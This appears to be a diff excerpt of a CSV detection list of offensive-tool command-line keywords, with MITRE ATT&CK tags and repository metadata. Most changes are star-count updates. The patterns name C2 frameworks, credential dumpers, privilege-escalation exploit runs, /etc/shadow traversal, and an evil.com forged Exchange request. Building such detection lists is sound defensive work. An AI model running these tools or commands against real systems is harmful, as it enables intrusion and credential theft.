FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","0","N/A","10","10","23","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" "*&& cat /etc/motd*exec -a -$(basename $SHELL) $SHELL*","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" -"*(not launching GPOddity SMB server)*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","90","6","2023-09-10T10:59:24Z","2023-09-01T08:13:25Z" +"*(not launching GPOddity SMB server)*","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1076 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","9","1","91","6","2023-10-04T21:15:32Z","2023-09-01T08:13:25Z" "**\Users\Public\termsrv.patch.dll*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*.*autodiscover\.json.*Powershell.*","offensive_tool_keyword","POC","forged request. exemple: autodiscover/autodiscover.json?@evil.com/&Email=autodiscover/autodiscover.json%3f@evil.com","T1190 - T1140 - T1564 - T1204 - T1505","TA0001 - TA0005","N/A","N/A","Exploitation tools","https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*../../../../../../etc/passwd*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*../../../../../../etc/shadow*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*../../../../../../etc/passwd*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*../../../../../../etc/shadow*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*./*octopus.py*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" "*./agscript *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*./awsloot *","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" "*./awsloot.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" -"*./Brutesploit*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","665","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"*./Brutesploit*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","1","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" "*./c2lint *","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*./chisel *","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.","T1071 - T1090 - T1102","N/A","N/A","N/A","POST Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*./cowpy.sh *","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","0","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" @@ -2157,61 +2157,61 @@ "*./Dirty-Pipe*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","1","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" "*./Dirty-Pipe*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","1","N/A","N/A","1","1","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" "*./dnscat*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z" -"*./dome.py*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","375","50","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" -"*./donut *.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*./dome.py*","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/v4d1/Dome","1","1","N/A","N/A","4","376","52","2022-03-10T12:08:17Z","2022-02-20T15:09:40Z" +"*./donut *.exe*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*./encryptor -f *.exe -o *.enc*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z" "*./Exfil.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" "*./exploit /etc/passwd 1 *cat /etc/passwd*","offensive_tool_keyword","dirty-pipe","POC exploitation for dirty pipe vulnerability","T1068 - T1055 - T1003 - T1015","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xIronGoat/dirty-pipe","1","0","N/A","N/A","1","9","9","2022-03-08T15:47:53Z","2022-03-08T15:30:45Z" "*./exploit /etc/passwd 1 ootz:*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z" -"*./fake-sms*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","N/A","8","10","2513","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" +"*./fake-sms*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" "*./fee.py*","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*./gcr.py*","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","N/A","10","10","78","15","2023-06-26T09:04:02Z","2023-06-18T13:23:31Z" "*./getExploit*","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Gioyik/getExploit","1","1","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z" "*./gimmeSH*","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/A3h1nt/gimmeSH","1","1","N/A","N/A","2","168","27","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z" -"*./go-secdump*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","1","81","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" +"*./go-secdump*","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","N/A","10","1","82","7","2023-05-02T15:01:10Z","2023-02-23T17:02:50Z" "*./hashcat -*","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","635","105","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" -"*./hashview/*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","319","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" -"*./Havoc","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*./havoc *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*./hashview/*","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","320","38","2023-09-22T21:30:50Z","2020-11-23T19:21:06Z" +"*./Havoc","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*./havoc *","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*./hoaxshell*","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1203 - T1133 - T1190","TA0001 - TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2655","443","2023-06-18T13:26:32Z","2022-07-10T15:36:24Z" -"*./hping *","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1296","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" -"*./hydra *","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8179","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" -"*./inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*./hping *","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1297","326","2022-10-04T12:14:24Z","2012-06-13T17:41:54Z" +"*./hydra *","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","N/A","N/A","10","8184","1825","2023-09-28T22:11:10Z","2014-04-24T14:45:37Z" +"*./inceptor.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" "*./koadic*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*./Lalin.sh*","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","1","N/A","N/A","4","350","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" "*./litefuzz.py*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","1","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" -"*./lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*./lse.sh*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*./manjusaka*","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","664","132","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*./Microsploit*","offensive_tool_keyword","BruteSploit","Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Microsploit","1","1","N/A","N/A","5","430","133","2017-07-11T16:28:27Z","2017-03-16T05:26:55Z" -"*./monkey.sh*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*./monkey.sh*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*./mythic-cli *","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://github.com/MythicAgents/tetanus","1","0","N/A","N/A","3","229","33","2023-05-14T21:34:20Z","2022-03-07T20:35:33Z" "*./Ninja.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*./ntdissector*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","73","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" -"*./nysm/src/","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","30","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" +"*./ntdissector*","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","1","75","6","2023-10-03T14:17:00Z","2023-09-05T12:13:47Z" +"*./nysm/src/","offensive_tool_keyword","nysm","nysm is a stealth post-exploitation container","T1610 - T1037 - T1070","TA0005 - TA0002 - TA0003","N/A","N/A","POST Exploitation tools","https://github.com/eeriedusk/nysm","1","0","N/A","10","1","32","3","2023-09-30T21:17:33Z","2023-09-25T10:03:52Z" "*./pachine.py*","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","8","3","262","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z" -"*./Passdetective*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","1","51","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"*./Passdetective*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" "*./Pcredz *","offensive_tool_keyword","Pcredz","This tool extracts Credit card numbers. NTLM(DCE-RPC. HTTP. SQL. LDAP. etc). Kerberos (AS-REQ Pre-Auth etype 23). HTTP Basic. SNMP. POP. SMTP. FTP. IMAP. etc from a pcap file or from a live interface.","T1116 - T1003 - T1002 - T1001 - T1005 - T1552","TA0003 - TA0002 - TA0011","N/A","N/A","Credential Access","https://github.com/lgandx/Pcredz","1","0","N/A","N/A","10","1771","383","2022-11-07T14:15:02Z","2014-04-07T02:03:33Z" "*./Phishing.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" "*./pwndrop *","offensive_tool_keyword","pwndrop","Self-deployable file hosting service for red teamers allowing to easily upload and share payloads over HTTP and WebDAV.","T1105 - T1071 - T1071.001 - T1090 - T1027 - T1027.005","TA0011 - TA0005 - TA0042","N/A","N/A","C2","https://github.com/kgretzky/pwndrop","1","0","N/A","10","10","1751","236","2023-02-25T05:08:15Z","2019-11-28T19:06:30Z" "*./PyShell *","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","0","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" 